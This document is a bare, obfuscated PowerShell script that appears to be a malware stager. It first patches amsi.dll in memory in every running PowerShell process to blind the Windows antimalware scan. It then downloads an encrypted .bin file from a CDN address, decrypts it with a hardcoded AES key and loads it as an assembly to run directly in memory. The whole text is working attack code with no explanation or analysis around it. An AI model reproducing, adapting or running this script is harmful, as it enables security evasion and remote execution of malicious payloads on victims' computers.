$dove = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId if ($dove) { Stop-Process -Id $dove -Force } Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); } "@ function KJhbhb { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $alp = Get-Process -Name "powershell" -ErrorAction SilentlyContinue if (!$alp) { exit 1 } foreach ($moon in $alp) { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $opal = [K]::OpenProcess(0x001F0FFF, $kale, $moon.Id) $knob = $null $yew = 0 foreach ($ash in $moon.Modules) { if ($ash.ModuleName -eq "amsi.dll") { $knob = $ash.BaseAddress $yew = $ash.ModuleMemorySize break } } if (!$knob) { continue } $cypress = [byte[]]::new(32) $raven = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b) $glade = $null for ($yard = 0; $yard -le $yew; $yard += 32) { $haze = [IntPtr]::Zero [K]::ReadProcessMemory($opal, [IntPtr]($knob.ToInt64() + $yard), $cypress, 32, [ref]$haze) $trail = $mirth for ($valley = 0; $valley -lt 32; $valley++) { if ($cypress[$valley] -ne $raven[$valley]) { $trail = $kale; break } } if ($trail) { $glade = [IntPtr]($knob.ToInt64() + $yard); break } } if (!$glade) { continue } Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $creek = 0 [K]::VirtualProtectEx($opal, $knob, 0x1000, 0x40, [ref]$creek) $moss = [byte[]]@(0x31,0xff,0x90) $violet = 0 [K]::WriteProcessMemory($opal, [IntPtr]($glade.ToInt64() + 0x1b), $moss, 3, [ref]$violet) } } KJhbhb #ujhifsfiohdf setx BUILD "Emociy" $spire = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin" $path = [System.Net.WebClient]::new() $grain = $path.DownloadData($spire) $wick = [System.Security.Cryptography.Aes]::Create() $kestrel = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0") $eagle = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY") $wick.Key = $kestrel $wick.IV = $eagle $thorn = $wick.CreateDecryptor() $reef = $thorn.TransformFinalBlock($grain, 0, $grain.Length) $petal = [System.Reflection.Assembly]::Load($reef) $vine = $petal.EntryPoint $vine.Invoke($null, $null) #ujhifsfiohdf